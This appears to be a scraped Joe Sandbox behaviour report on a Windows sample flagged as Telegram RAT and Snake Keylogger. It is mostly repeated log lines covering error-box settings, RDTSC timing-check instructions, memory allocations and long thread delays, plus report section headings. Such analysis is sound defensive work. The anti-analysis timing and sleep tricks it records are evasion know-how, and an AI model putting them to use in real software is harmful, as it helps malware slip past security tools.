Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	API/Special instruction interceptor: Address: 4645CA5
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	API/Special instruction interceptor: Address: 3595CA5

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	RDTSC instruction interceptor: First address: 461E469 second address: 461E469 instructions: 0x00000000 rdtsc 0x00000002 test ax, 000022EAh 0x00000006 cmp ebx, ecx 0x00000008 jc 00007FF72515F180h 0x0000000a test esi, 590B1F5Fh 0x00000010 inc ebp 0x00000011 inc ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	RDTSC instruction interceptor: First address: 356E469 second address: 356E469 instructions: 0x00000000 rdtsc 0x00000002 test ax, 000022EAh 0x00000006 cmp ebx, ecx 0x00000008 jc 00007FF724B24120h 0x0000000a test esi, 590B1F5Fh 0x00000010 inc ebp 0x00000011 inc ebx 0x00000012 rdtsc

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Memory allocated: 4BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Memory allocated: 35370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Memory allocated: 37370000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 599668	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 599228	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 598248	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 597702	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 597592	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 597462	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 597139	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 597027	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 596915	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 596695	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 596591	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 596472	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 596350	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 595483	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 595155	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Thread delayed: delay time: 594500	Jump to behavior

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hUMdKouQ1H.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
hUMdKouQ1H.exe

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Window / User API: threadDelayed 2594			Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe	Window / User API: threadDelayed 7260			Jump to behavior

Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -39660499758475511s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 344	Thread sleep count: 2594 > 30	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 344	Thread sleep count: 7260 > 30	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -599780s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -599668s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -599228s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -598577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -598248s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -597921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -597702s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -597592s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -597462s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -597249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -597139s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -597027s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -596915s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -596695s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -596591s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -596472s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -596350s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -596140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\hUMdKouQ1H.exe TID: 6604	Thread sleep time: -596031s >= -30000s	Jump to behavior
